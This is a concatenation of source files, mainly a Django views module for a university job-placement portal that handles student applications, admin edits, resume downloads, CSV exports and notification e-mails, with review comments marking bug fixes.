_ssa_decompose_to_csv(train, save_path[station]+'SSA_TRAIN.csv')
#%%
# Decompose the training+development subset.
_ssa_decompose_to_csv(train_dev, save_path[station]+'SSA_TRAINDEV.csv')
#%%
# Extend the training set one month at a time and decompose each appended
# series separately (simulates forecasting-time decomposition).
# Note: the original loop rebound the name `data`, clobbering the
# station->series dict defined above; the slice is now passed directly.
for i in range(1, 241):
    _ssa_decompose_to_csv(
        full[0:train_len+i],
        save_path[station]+'ssa-test/ssa_appended_test'+str(train_len+i)+'.csv')
|
<gh_stars>1-10
# //=======================================================================
# // Copyright JobPort, IIIT Delhi 2015.
# // Distributed under the MIT License.
# // (See accompanying file LICENSE or copy at
# // http://opensource.org/licenses/MIT)
# //=======================================================================
# __author__ = 'naman'
import StringIO
import csv
import os
import zipfile
from multiprocessing import Process
from django.contrib import messages
from django.contrib.auth import logout as auth_logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils import timezone
from jobport import forms
from jobport.helpers import is_admin, is_member, is_eligible, checkdeadline
from jobport.models import Job, Student, Batch
from placement import settings
def _send_mail(subject, text_content, host_user, recipient_list):
    """Sending mail to the recipient_list. Written by http://darkryder.me/."""
    # Runs inside a worker Process (see send_mail below), so the blocking
    # SMTP I/O happens off the request thread.
    msg = EmailMultiAlternatives(
        subject, text_content, host_user, recipient_list)
    a = msg.send()  # number of messages delivered; only logged, not checked
    print "Mail sent"
def send_mail(subject, text_content, recipient_list):
    """Start the process for sending mails. Written by http://darkryder.me/."""
    # Fire-and-forget: spawn a worker so the HTTP request never blocks on SMTP.
    mail_args = (subject, text_content,
                 settings.EMAIL_HOST_USER, recipient_list)
    worker = Process(target=_send_mail, args=mail_args)
    worker.start()
def server_error(request):
    """Error page for 500."""
    page = render(request, "jobport/500.html")
    page.status_code = 500  # render() defaults to 200; force the error code
    return page
def not_found(request):
    """Error page for 404."""
    page = render(request, "jobport/404.html")
    page.status_code = 404  # render() defaults to 200; force the error code
    return page
# def test(request):
# return render(request, 'jobport/material.min.js.map')
def home(request):
    """Landing home page after login of student or admin."""
    if request.user.is_authenticated():
        context = {'user': request.user,
                   'jobs': Job.objects.all().order_by('-deadline')}
        # NOTE(review): other call sites pass a Group object to is_member;
        # here a plain string 'admin' is passed — confirm is_member accepts both.
        if is_member(request.user, 'admin'):
            return render(request, 'jobport/admin_home.html', context)
        else:
            studentgroup = Group.objects.get(name='student')
            if (not is_member(request.user, studentgroup)):
                # Logged in but not yet registered as a student: force sign-up.
                return HttpResponseRedirect('/newuser')
            return render(request, 'jobport/home_student.html', context)
    # Anonymous visitors get the public welcome page.
    return render(request, 'jobport/welcome.html')
@login_required()
def jobapply(request, jobid):
    """Apply for a job, if deadline permits.

    Adds the job to the student's applications when the deadline has not
    passed and the student is eligible; otherwise renders the appropriate
    denial page. Fetches the job once — the original issued three identical
    DB queries for the same primary key.
    """
    job = Job.objects.get(pk=jobid)
    if timezone.now() < job.deadline:
        if is_eligible(request.user.student, job)['value']:
            request.user.student.companyapplications.add(job)
            messages.success(request, 'Thanks for applying!')
            return HttpResponseRedirect('/')
        else:
            return render(request, 'jobport/badboy.html')
    else:
        return render(request, 'jobport/latedeadline.html')
@login_required()
def jobwithdraw(request, jobid):
    """Withdraw from the job, if deadline permits.

    Fetches the job once — the original issued two identical DB queries.
    """
    job = Job.objects.get(pk=jobid)
    if timezone.now() < job.deadline:
        request.user.student.companyapplications.remove(job)
        messages.success(request, 'You have withdrawn!')
        return HttpResponseRedirect('/')
    else:
        return render(request, 'jobport/latedeadline.html')
@login_required()
def myapplications(request):
    """Enumerate student's applications for a job."""
    # Users without a Student record must register first.
    studentgroup = Group.objects.get(name='student')
    if not is_member(request.user, studentgroup):
        return HttpResponseRedirect('/newuser')
    applied_jobs = request.user.student.companyapplications.all()
    return render(request, 'jobport/applications_student.html',
                  {'user': request.user, 'jobs': applied_jobs})
@login_required()
def jobpage(request, jobid):
    """Loads the page for a particular Job.

    Admins get the management view; students get the apply view annotated
    with eligibility, deadline and whether they already applied. Fetches the
    job once — the original re-queried the same Job up to five times.
    """
    job = Job.objects.get(pk=jobid)
    if is_admin(request.user):
        context = {'user': request.user, 'job': job}
        return render(request, 'jobport/admin_job.html', context)
    else:
        # Non-zero count means the student already applied to this job.
        hasapplied = request.user.student.companyapplications.filter(
            pk__contains=jobid).count()
        iseligible = is_eligible(request.user.student, job)
        deadlinepassed = checkdeadline(job)
        context = {'user': request.user, 'job': job, 'deadlinepassed': deadlinepassed,
                   'hasapplied': hasapplied, 'iseligible': iseligible['value'],
                   'iseligiblereasons': iseligible['reasons']}
        return render(request, 'jobport/job_student.html', context)
@login_required()
def admineditstudent(request, studentid):
    """Allows admin to change the student details."""
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.AdminStudentForm(
                request.POST, request.FILES, instance=Student.objects.get(pk=studentid))
            if form.is_valid():
                usr = form.save(commit=False)
                if (request.FILES.__len__() == 0):
                    # No new upload: keep the resume already on record.
                    usr.resume = Student.objects.get(pk=studentid).resume
                else:
                    # Normalize uploaded resume filename to <batch>_<rollno>.pdf.
                    my_student = Student.objects.get(pk=studentid)
                    usr.resume.name = my_student.batch.title + '_' + \
                        my_student.user.username.split('@')[0] + ".pdf"
                # Derive the student's institute email from their username.
                # NOTE(review): this checks request.user (the admin), not the
                # edited student — confirm that is intended.
                if "@iiitd.ac.in" in request.user.username:
                    usr.email = Student.objects.get(
                        pk=studentid).user.username
                else:
                    usr.email = Student.objects.get(
                        pk=studentid).user.username + "@iiitd.ac.in"
                usr.save()
                form.save_m2m()  # commit=False above defers m2m; persist it now
                messages.success(request, 'Your form was saved')
                return HttpResponseRedirect('/batches')
            else:
                messages.error(request, 'Error in form!')
                context = {'form': form}
                return render(request, 'jobport/admin_editstudent.html', context)
        elif request.method == 'GET':
            studentform = forms.AdminStudentForm(
                instance=Student.objects.get(pk=studentid))
            context = {'user': request.user,
                       'form': studentform, 'layout': 'horizontal'}
            return render(request, 'jobport/admin_editstudent.html', context)
        # Fallback for other HTTP methods.
        return HttpResponseRedirect('/')
    else:
        return render(request, 'jobport/badboy.html')
@login_required()
def getresumes(request, jobid):
    """Return resumes for students according to the incoming request."""
    # Builds an in-memory zip of resume PDFs for either the selected
    # candidates (?req=selected) or all applicants of the job.
    if is_admin(request.user):
        filenames = []
        if (request.GET.get('req') == 'selected'):
            checklist = Job.objects.get(pk=jobid).selectedcandidates.all()
            zip_subdir = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
                pk=jobid).profile + "_Selected_Resumes"
        else:
            checklist = Job.objects.get(
                pk=jobid).applicants.all()  # AllApplicants
            zip_subdir = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
                pk=jobid).profile + "_Applicant_Resumes"
        for student in checklist:
            # NOTE(review): these guards skip students whose qualification
            # MATCHES the requested ?qual value, which looks inverted —
            # confirm whether 'qual' means "exclude" here.
            if (request.GET.get('qual') == 'G' and student.batch.pg_or_not == 'G'):
                continue
            if (request.GET.get('qual') == 'P' and student.batch.pg_or_not == 'P'):
                continue
            filenames.append(student.resume.path)
        zip_filename = "%s.zip" % zip_subdir
        # Assemble the archive in memory (Python 2 StringIO) and stream it.
        s = StringIO.StringIO()
        zf = zipfile.ZipFile(s, "w")
        for fpath in filenames:
            fdir, fname = os.path.split(fpath)
            zip_path = os.path.join(zip_subdir, fname)
            zf.write(fpath, zip_path)
        zf.close()
        # `mimetype=` is the pre-Django-1.7 keyword (renamed content_type later).
        resp = HttpResponse(
            s.getvalue(), mimetype="application/x-zip-compressed")
        resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename
        return resp
    else:
        return render(request, 'jobport/badboy.html')
@login_required()
def profile(request):
    """Allows editing student profile by themselves.

    GET renders the pre-filled form; POST validates and saves, deriving the
    institute email from the username and normalizing the uploaded resume
    filename. Fix: removed the duplicated `usr.email = usr.email = ...`
    assignment from the original.
    """
    studentgroup = Group.objects.get(name='student')
    if not is_member(request.user, studentgroup):
        return HttpResponseRedirect('/newuser')
    if request.method == 'POST':
        form = forms.StudentForm(
            request.POST, request.FILES, instance=request.user.student)
        if form.is_valid():
            usr = form.save(commit=False)
            usr.user = request.user
            # Derive the institute email from the username.
            if "@<EMAIL>.ac.in" in request.user.username:
                usr.email = request.user.username
            else:
                usr.email = request.user.username + "@<EMAIL>.ac.in"
            if request.FILES.__len__() == 0:
                # No new upload: keep the previously stored resume.
                usr.resume = request.user.student.resume
            else:
                # Normalize uploaded resume filename to <batch>_<rollno>.pdf.
                usr.resume.name = usr.batch.title + '_' + \
                    request.user.username.split('@')[0] + ".pdf"
            usr.save()
            messages.success(request, 'Your details were saved.')
            return HttpResponseRedirect('/')
        else:
            context = {'form': form, 'student': request.user.student}
            return render(request, 'jobport/student_profile.html', context)
    elif request.method == 'GET':
        studentform = forms.StudentForm(instance=request.user.student)
        context = {'user': request.user, 'form': studentform, 'layout': 'horizontal',
                   'student': request.user.student}
        return render(request, 'jobport/student_profile.html', context)
def newuser(request):
    """New User Sign Up form.

    Ensures the 'student' group exists, then registers the logged-in user
    as a Student on a valid POST. Fixes two bugs from the original: the
    redirect for already-registered students was built but never returned,
    and `usr.batch` was assigned only AFTER `usr.save()`, so the batch was
    never persisted.
    """
    studentgroup, created = Group.objects.get_or_create(
        name='student')  # Creating user group
    if request.user.is_authenticated():
        if is_member(request.user, studentgroup):
            # BUG FIX: `return` was missing, so registered students fell
            # through to the sign-up form again.
            return HttpResponseRedirect('/')
        if request.method == 'POST':
            form = forms.NewStudentForm(request.POST, request.FILES)
            if form.is_valid():
                usr = form.save(commit=False)
                usr.user = request.user
                usr.email = request.user.username + "@iiitd.ac.in"
                usr.name = request.user.first_name + " " + request.user.last_name
                usr.resume.name = request.user.username.split('@')[0] + ".pdf"
                # BUG FIX: set the batch before saving; the original set it
                # after save() and never saved again.
                usr.batch = form.cleaned_data['batch']
                usr.save()
                studentgroup.user_set.add(request.user)
                messages.success(
                    request, 'Your details were saved. Welcome to JobPort.')
                return HttpResponseRedirect('/')
            else:
                context = {'form': form, 'resumer_url': settings.RESUME_URL}
                return render(request, 'jobport/newstudent.html', context)
        elif request.method == 'GET':
            studentform = forms.NewStudentForm()
            context = {'user': request.user, 'form': studentform, 'layout': 'horizontal',
                       'resumer_url': settings.RESUME_URL}
            return render(request, 'jobport/newstudent.html', context)
    return HttpResponseRedirect('/')
def logout(request):
    """Logs out user"""
    # Delegates to django.contrib.auth.logout (imported as auth_logout to
    # avoid clashing with this view's name), then returns home.
    auth_logout(request)
    return HttpResponseRedirect('/')
def needlogin(request):
    """need login"""
    # Static page shown when an anonymous user hits a protected view.
    return render(request, 'jobport/needlogin.html')
@login_required()
def openjob(request):
    """Open a new Job from admin side.

    On a valid POST: saves the job, attaches its batches, and notifies by
    email every student who is neither debarred ('D') nor not-interested
    ('NI'). Fix: the original mutated settings.EMAIL_HOST_USER with `+=`
    and "restored" it with `+= ''` (a no-op), so the setting grew on every
    request; the original value is now saved and restored.
    """
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.JobForm(request.POST)
            if form.is_valid():
                tosavejob = form.save(commit=False)
                tosavejob.createdon = timezone.now()
                tosavejob.save()  # need a pk before m2m batches can be added
                for x in form.cleaned_data['batch']:
                    tosavejob.batch.add(x)
                tosavejob.save()
                recipients = []
                for student in Student.objects.all():
                    if student.status == 'D' or student.status == 'NI':
                        continue
                    recipients.append(student.email)
                # send_mail snapshots the sender at call time (passed as a
                # Process arg), so restoring immediately afterwards is safe.
                original_host_user = settings.EMAIL_HOST_USER
                settings.EMAIL_HOST_USER += '<EMAIL>'
                try:
                    send_mail(
                        'New Job in JobPort!',
                        'Hey!\n\nA new job for ' + tosavejob.profile + ', ' + tosavejob.company_name +
                        ' was added on JobPort. \n Please login at jobport.iiitd.edu.in:8081',
                        recipients
                    )
                finally:
                    settings.EMAIL_HOST_USER = original_host_user
                return HttpResponseRedirect('/')
            else:
                context = {'form': form}
                return render(request, 'jobport/openjob.html', context)
        else:
            form = forms.JobForm()
            c = {'form': form}
            return render(request, 'jobport/openjob.html', c)
    else:
        return render(request, 'jobport/notallowed.html')
@login_required()
def jobdelete(request, jobid):
    """Delete a Job from admin side."""
    if is_admin(request.user):
        Job.objects.get(pk=jobid).delete()
        return HttpResponseRedirect('/')
    # BUG FIX: the original returned None for non-admins, which makes
    # Django raise ValueError; render the standard denial page instead.
    return render(request, 'jobport/badboy.html')
@login_required()
def jobedit(request, jobid):
    """Edit Job details from admin side.

    POST validates and saves the edited job; GET renders the pre-filled
    form. Fix: the original returned None for non-admin users (a crash in
    Django); they now get the standard denial page.
    """
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.JobForm(request.POST, request.FILES,
                                 instance=Job.objects.get(pk=jobid))
            if form.is_valid():
                form.save()  # This does the trick!
                messages.success(request, 'Job was saved')
                return HttpResponseRedirect('/job/' + str(jobid) + '/')
            else:
                context = {'form': form}
                return render(request, 'jobport/admin_editjob.html', context)
        else:
            form = forms.JobForm(instance=Job.objects.get(pk=jobid))
            c = {'form': form}
            return render(request, 'jobport/admin_editjob.html', c)
    return render(request, 'jobport/badboy.html')
@login_required()
def jobapplicants(request, jobid):
    """See the applicants for a particular Job.

    Shows all applicants plus a count of eligible students. Fixes: the job
    is fetched once (the original queried it three times) and non-admins
    now get a denial page instead of a None return (a Django crash).
    """
    if is_admin(request.user):
        job = Job.objects.get(pk=jobid)
        count = 0
        for student in Student.objects.all():
            if is_eligible(student, job)['value']:
                count = count + 1
        context = {'eligiblestudentcount': count,
                   'applicants': job.applicants.all(),
                   'job': job}
        return render(request, 'jobport/admin_jobapplicants.html', context)
    return render(request, 'jobport/badboy.html')
@login_required()
def sendselectedemail(request, jobid):
    """Send mail to selected students for a particular Job.

    Marks every selected candidate as placed ('P') and emails them. Fixes:
    settings.EMAIL_HOST_USER is saved and restored (the original's trailing
    `+= ''` was a no-op, so the setting grew on every request), and
    non-admins now get a denial page instead of a None return.
    """
    if is_admin(request.user):
        candemail = []
        thejob = Job.objects.get(pk=jobid)
        for candidate in thejob.selectedcandidates.all():
            candidate.status = 'P'  # mark as placed
            candidate.save()
            candemail.append(str(candidate.email))
        original_host_user = settings.EMAIL_HOST_USER
        settings.EMAIL_HOST_USER += '<EMAIL>'
        try:
            send_mail(
                'Congratulations! You\'ve been placed! :D',
                "Hey!\n\nCongratulations! You have been placed as " +
                thejob.profile + ' at ' + thejob.company_name + "!!",
                candemail
            )
        finally:
            settings.EMAIL_HOST_USER = original_host_user
        messages.success(request, 'Mails Sent!')
        return HttpResponseRedirect('/')
    return render(request, 'jobport/badboy.html')
@login_required()
def adminjobselected(request, jobid):
    """Select the final students fot the Job :D"""
    # POST stores the set of selected candidates for the job and marks each
    # one as placed ('P'); GET shows the current selection form.
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.AdminSelectedApplicantsForm(
                request.POST, instance=Job.objects.get(pk=jobid))
            if form.is_valid():
                tosavejob = form.save(commit=False)
                tosavejob.save()
                # NOTE(review): three save calls (instance save, form.save,
                # save_m2m) look redundant — form.save() alone should persist
                # both the instance and its m2m data; confirm before pruning.
                form.save()
                form.save_m2m()
                for candidate in Job.objects.get(pk=jobid).selectedcandidates.all():
                    candidate.status = 'P'
                    candidate.save()
                return HttpResponseRedirect('/')
            else:
                context = {'form': form}
                return render(request, 'jobport/admin_jobselections.html', context)
        else:
            form = forms.AdminSelectedApplicantsForm(
                instance=Job.objects.get(pk=jobid))
            context = {'selected': Job.objects.get(pk=jobid).selectedcandidates.all(), 'form': form,
                       'job': Job.objects.get(pk=jobid)}
            return render(request, 'jobport/admin_jobselections.html', context)
@login_required()
def uploadcgpa(request):
    """Upload the CGPA CSV for all the students, to update student CGPAs."""
    if is_admin(request.user):
        if request.method == 'POST':
            # Reject requests with no (or an empty) attached file.
            if (not request.FILES.get('cgpafile', None)) or not request.FILES['cgpafile'].size:
                messages.error(request, 'File Not Found!')
                return render(request, 'jobport/admin_uploadcgpa.html')
            upload_file = request.FILES['cgpafile']
            notfound = []
            # Each CSV row is (roll_no, cgpa). Roll numbers starting with
            # 'MT' are treated as postgrad students (cgpa_pg vs cgpa_ug).
            for row in csv.reader(upload_file.read().splitlines()):
                try:
                    stud = Student.objects.get(pk=row[0])
                    if (row[0][:2].upper() == 'MT'):
                        stud.cgpa_pg = float(row[1])
                    else:
                        stud.cgpa_ug = float(row[1])
                    stud.save()
                except ObjectDoesNotExist:
                    # Unknown roll number: collect it for the report instead
                    # of aborting the whole upload.
                    notfound.append(row[0])
            context = {'notfound': notfound}
            messages.success(request, 'CGPA was succesfully uploaded')
            return render(request, 'jobport/admin_uploadcgpa.html', context)
        else:
            return render(request, 'jobport/admin_uploadcgpa.html')
    else:
        return render(request, 'jobport/notallowed.html')  # 403 Error
@login_required()
def stats(request):
    """Calculating statistics for the statistics page.

    Builds, for the admin dashboard: a CGPA histogram per student, the
    minimum required CGPA per job, and placed/unplaced counts over students
    who are still interested (status not 'NI'/'D').
    """
    if is_admin(request.user):
        numstudentsplaced = 0
        cgpahistdata = []
        uninterested_students = []
        Students = Student.objects.all()
        Jobs = Job.objects.all()
        for student in Students:
            if student.status == 'P':
                numstudentsplaced += 1
            if student.status == 'NI' or student.status == 'D':
                # BUG FIX: the original did `uninterested_students += 1`,
                # which raises TypeError (list += int). Collect the student
                # so len(uninterested_students) below works as intended.
                uninterested_students.append(student)
            # CGPA Hist
            if student.batch.pg_or_not == 'G':
                if student.cgpa_ug is not None and student.cgpa_ug != 0:
                    cgpahistdata.append([student.rollno, student.cgpa_ug])
            else:
                if student.cgpa_pg is not None and student.cgpa_pg != 0:
                    cgpahistdata.append([student.rollno, student.cgpa_pg])
        jobcgpahistdata = []
        for job in Jobs:
            if job.cgpa_min is not None:
                jobcgpahistdata.append(
                    [(job.company_name + ", " + job.profile), job.cgpa_min])
        interested_students = len(Students) - len(uninterested_students)
        placedunplaceddata = [["Placed Students", numstudentsplaced],
                              ["Unplaced Students", interested_students - numstudentsplaced]]
        context = {'cgpahistdata': cgpahistdata, 'jobcgpahistdata': jobcgpahistdata,
                   'placedunplaceddata': placedunplaceddata, 'numstudents': interested_students,
                   'numstudentsplaced': numstudentsplaced, 'numjobs': len(Jobs)}
        return render(request, 'jobport/admin_stats.html', context)
    # BUG FIX: the original returned None for non-admins (a Django crash).
    return render(request, 'jobport/badboy.html')
@login_required()
def blockedUnplacedlist(request):
    """Retrieves the list for Unplaced or Blocked/Debarred students.

    Streams a CSV of students filtered by ?req= (debarred / unplaced /
    placed / notInterested / all). Fix: an unknown or missing `req` left
    `students` unbound in the original (NameError); it now renders the
    denial page instead.
    """
    if is_admin(request.user):
        # Map each request kind to (status filter, attachment filename).
        filters = {
            'debarred': ('D', 'BlockedStudents_list.csv'),
            'unplaced': ('N', 'UnplacedStudents_list.csv'),
            'placed': ('P', 'PlacedStudents_list.csv'),
            'notInterested': ('NI', 'NotInterested_list.csv'),
        }
        req = request.GET.get('req')
        if req == 'all':
            students = Student.objects.all()
            filename = 'All_list.csv'
        elif req in filters:
            status, filename = filters[req]
            students = Student.objects.filter(status=status)
        else:
            return render(request, 'jobport/badboy.html')
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = str(
            'attachment; filename="' + filename + '"')
        writer = csv.writer(response)
        writer.writerow(
            ["RollNo", "Name", "Email", "Gender", "Batch", "UnderGrad CGPA", "PostGrad CGPA{for PG}",
             "Graduating University",
             "PostGraduating University", "10th Marks", "12th Marks", "Backlogs", "Contact No."])
        for student in students:
            writer.writerow(
                [student.rollno, student.name, student.email, student.get_gender_display(), student.batch,
                 student.cgpa_ug,
                 student.cgpa_pg, student.university_ug, student.university_pg, student.percentage_tenth,
                 student.percentage_twelfth, student.get_backlogs_display(), student.phone])
        return response
    else:
        return render(request, 'jobport/badboy.html')
@login_required()
def getjobcsv(request, jobid):
    """Gets different (Eligible, Applied, Selected) CSVs for a particular Jobs."""
    # Streams a CSV of students for the job, chosen by ?req= (selected /
    # applied / eligible), optionally restricted by ?qualification= (ug/pg).
    if is_admin(request.user):
        response = HttpResponse(content_type='text/csv')
        # NOTE(review): an unknown/missing `req` leaves `studlist` and
        # `name` unbound, so the view raises NameError — confirm callers
        # always pass a valid value, or add a guard.
        if (request.GET.get('req') == 'selected'):
            studlist = Job.objects.get(pk=jobid).selectedcandidates.all()
            name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
                pk=jobid).profile + "_Selected.csv"
        elif (request.GET.get('req') == 'applied'):
            studlist = Job.objects.get(pk=jobid).applicants.all()
            name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
                pk=jobid).profile + "_Applicants.csv"
        elif (request.GET.get('req') == 'eligible'):
            studlist = []
            for student in Student.objects.all():
                if is_eligible(student, Job.objects.get(pk=jobid))['value']:
                    studlist.append(student)
            name = Job.objects.get(pk=jobid).company_name + "_" + Job.objects.get(
                pk=jobid).profile + "_Eligible.csv"
        response[
            'Content-Disposition'] = str('attachment; filename="' + name + '"')
        writer = csv.writer(response)
        writer.writerow([Job.objects.get(pk=jobid).company_name,
                         Job.objects.get(pk=jobid).profile])
        writer.writerow(
            ["RollNo", "Name", "Email", "Gender", "CGPA", "Batch", "Graduating University", "10th Marks",
             "12th Marks", "Backlogs", "Conact No.", "UnderGrad CGPA{PG}"]
        )
        for student in studlist:
            # Undergrads use cgpa_ug; postgrads additionally report their
            # undergrad CGPA in the trailing column.
            if (student.batch.pg_or_not == 'G' and request.GET.get('qualification') != 'pg'):
                writer.writerow(
                    [student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_ug,
                     student.batch,
                     student.university_ug, student.percentage_tenth, student.percentage_twelfth,
                     student.get_backlogs_display(), student.phone]
                )
            if (student.batch.pg_or_not == 'P' and request.GET.get('qualification') != 'ug'):
                writer.writerow(
                    [student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_pg,
                     student.batch, student.university_pg, student.percentage_tenth, student.percentage_twelfth,
                     student.get_backlogs_display(), student.phone, student.cgpa_ug]
                )
        return response
    else:
        return render(request, 'jobport/badboy.html')
@login_required()
def getbatchlist(request, batchid):
    """Retrieves the list for students in a Batch.

    Streams a CSV of all students in the batch. Fetches the batch once —
    the original queried the same Batch twice.
    """
    if is_admin(request.user):
        batch = Batch.objects.get(pk=batchid)
        response = HttpResponse(content_type='text/csv')
        studlist = batch.studentsinbatch.all()
        response['Content-Disposition'] = str(
            'attachment; filename="' + batch.title + '_list.csv"')
        writer = csv.writer(response)
        writer.writerow(
            ["RollNo", "Name", "Email", "Gender", "UnderGrad CGPA", "PostGrad CGPA", "Graduating University",
             "PostGraduating University", "10th Marks", "12th Marks", "Backlogs", "Contact No."])
        for student in studlist:
            writer.writerow(
                [student.rollno, student.name, student.email, student.get_gender_display(), student.cgpa_ug,
                 student.cgpa_pg, student.university_ug, student.university_pg, student.percentage_tenth,
                 student.percentage_twelfth, student.get_backlogs_display(), student.phone])
        return response
    else:
        return render(request, 'jobport/badboy.html')
def feedback(request):
    """FeedbackForm"""
    # Saves the feedback and forwards it by mail to the JobPort inbox.
    if (request.method == 'POST'):
        form = forms.FeedbackForm(request.POST)
        # pdb.set_trace()
        if form.is_valid():
            form.save()
            # NOTE: `type` shadows the builtin; it holds the human-readable
            # label looked up from the field's choices.
            type = form.cleaned_data['type']
            type = dict(form.fields['type'].choices)[type]
            # NOTE(review): the trailing `+= ''` below does not undo this
            # append, so EMAIL_HOST_USER grows on every feedback — confirm
            # and restore the original value instead.
            settings.EMAIL_HOST_USER += '<EMAIL>'
            send_mail(
                '[' + type + '] ' + form.cleaned_data['title'],
                'A new feedback was posted on JobPort' + '\n\n' +
                form.cleaned_data['body'], ['jobportiiitd<EMAIL>']
            )
            settings.EMAIL_HOST_USER += ''
            messages.success(
                request, 'Thanks for filling your precious feedback! :) ')
            return HttpResponseRedirect('/')
        else:
            context = {'form': form}
            return render(request, 'jobport/feedback.html', context)
    else:
        form = forms.FeedbackForm()
        context = {'form': form}
        return render(request, 'jobport/feedback.html', context)
@login_required()
def fileview(request, filename):
    """Protect the resume location, by adding headers, using nginx."""
    # Empty body: nginx serves the actual file via the X-Accel-Redirect
    # internal-location header.
    resp = HttpResponse()
    resp['Content-Type'] = 'application/pdf'
    resp['X-Accel-Redirect'] = "/protected/{0}".format(filename)
    return resp
@login_required()
def docfileview(request, filename):
    """Protect the job file location, by adding headers, using nginx."""
    # Empty body: nginx serves the actual file via the X-Accel-Redirect
    # internal-location header.
    resp = HttpResponse()
    resp['Content-Type'] = 'application/pdf'
    resp['X-Accel-Redirect'] = "/jobfiles/{0}".format(filename)
    return resp
@login_required()
def batchcreate(request):
    """Create a Batch."""
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.BatchForm(request.POST)
            if form.is_valid():
                tosavebatch = form.save(commit=False)
                tosavebatch.createdon = timezone.now()
                tosavebatch.save()
            else:
                messages.error(
                    request, "There was error in the data, please try again!")
            # Both valid and invalid POSTs redirect to the batch list; on
            # error only the flash message tells the user what happened.
            return HttpResponseRedirect(reverse('viewbatches'))
        else:
            form = forms.BatchForm()
            c = {'form': form}
            return render(request, 'jobport/openbatch.html', c)
    else:
        return render(request, 'jobport/notallowed.html')
@login_required()
def batchdestroy(request, batchid):
    """Delete a Batch."""
    if is_admin(request.user):
        Batch.objects.get(pk=batchid).delete()
        return HttpResponseRedirect('/')
    # BUG FIX: the original returned None for non-admins, which makes
    # Django raise ValueError; render the standard denial page instead.
    return render(request, 'jobport/badboy.html')
@login_required()
def batchedit(request, batchid):
    """Edit details of a Batch."""
    # NOTE(review): non-admin users fall off the end and get None, which
    # crashes in Django — confirm and add a denial page.
    if is_admin(request.user):
        if request.method == 'POST':
            form = forms.BatchForm(
                request.POST, instance=Batch.objects.get(pk=batchid))
            if form.is_valid():
                form.save()
                messages.success(request, 'Batch was updated!')
                return HttpResponseRedirect('/batch/' + str(batchid) + '/')
            else:
                context = {'form': form}
                return render(request, 'jobport/admin_editbatch.html', context)
        else:
            form = forms.BatchForm(instance=Batch.objects.get(pk=batchid))
            c = {'form': form}
            return render(request, 'jobport/admin_editbatch.html', c)
@login_required()
def viewbatches(request):
    """View the list of all Batches."""
    if not is_admin(request.user):
        return render(request, 'jobport/badboy.html')
    all_batches = Batch.objects.all()
    return render(request, 'jobport/batches.html', {'batch': all_batches})
@login_required()
def batchpage(request, batchid):
    """Batch Page.

    Admin view of one batch and its students. Fetches the batch once —
    the original queried the same Batch twice.
    """
    if is_admin(request.user):
        batch = Batch.objects.get(pk=batchid)
        context = {'user': request.user,
                   'student': batch.studentsinbatch.all(),
                   'batch': batch}
        return render(request, 'jobport/admin_batch.html', context)
    return render(request, 'jobport/welcome.html')
@login_required()
def getbatchresumes(request, batchid):
    """Get resumes for a Batch."""
    # Builds an in-memory zip of every student resume in the batch and
    # streams it as an attachment.
    if is_admin(request.user):
        filenames = []
        checklist = Batch.objects.get(pk=batchid).studentsinbatch.all()
        zip_subdir = Batch.objects.get(pk=batchid).title + "_resumes"
        for student in checklist:
            filenames.append(student.resume.path)
        zip_filename = "%s.zip" % zip_subdir
        # Python 2 StringIO buffer; the archive never touches disk.
        s = StringIO.StringIO()
        zf = zipfile.ZipFile(s, "w")
        for fpath in filenames:
            fdir, fname = os.path.split(fpath)
            zip_path = os.path.join(zip_subdir, fname)
            zf.write(fpath, zip_path)
        zf.close()
        # `mimetype=` is the pre-Django-1.7 keyword (renamed content_type later).
        resp = HttpResponse(
            s.getvalue(), mimetype="application/x-zip-compressed")
        resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename
        return resp
    else:
        return render(request, 'jobport/badboy.html')
@login_required()
def uploadstudentsinbatch(request, batchid):
    """Add students in a batch, by uploading a CSV. Will not be required IMHO.

    Each CSV row starts with a student roll number; every matching Student
    is moved into the given batch, unknown roll numbers are reported back.
    Fixes: the original called `Batch.get.objects(pk=batchid)` — an
    AttributeError on every row — and re-fetched the batch per row; the
    batch is now fetched once, correctly. Also renamed `file`, which
    shadowed the builtin.
    """
    if is_admin(request.user):
        if request.method == 'POST':
            upload_file = request.FILES['students']
            notfound = []
            batch = Batch.objects.get(pk=batchid)
            for row in csv.reader(upload_file.read().splitlines()):
                try:
                    stud = Student.objects.get(pk=row[0])
                    stud.batch = batch
                    stud.save()
                except ObjectDoesNotExist:
                    notfound.append(row[0])
            context = {'notfound': notfound}
            messages.success(
                request, 'Students succesfully added to the Batch!')
            return render(request, 'jobport/admin_addstudentstobatch.html', context)
        else:
            return render(request, 'jobport/admin_addstudentstobatch.html')
    else:
        return render(request, 'jobport/notallowed.html')  # 403 Error
@login_required()
def search(request):
    """Search, something. anything."""
    if is_admin(request.user):
        form = forms.RootSearchForm(request.GET)
        query = request.GET.get('q')
        # NOTE(review): when 'q' is absent entirely, query is None (not ''),
        # so this guard is skipped and form.search() runs anyway — confirm
        # whether that is intended.
        if query == '':
            messages.error(request, 'Please enter a Query!')
            return render(request, 'jobport/notallowed.html')
        else:
            return render(request, 'jobport/result.html',
                          {'search_query': query, 'results': form.search()})
    else:
        return render(request, 'jobport/notallowed.html')  # 403 Error
|
<reponame>augustand/Jmonitor
# -*- coding:utf-8 -*-
import json
from pony.orm import db_session, delete, select
from pony.orm.serialization import to_dict
from project.db.model import Template, Project
class ProjectHandle(object):
    """RPC-style handler for supervised projects.

    Template holds the per-program configuration; Project holds one row per
    spawned process. All public methods accept and return JSON strings.
    (Python 2 source: uses `except Exception, e` and print statements.)
    """

    def add_projects(self, projects):
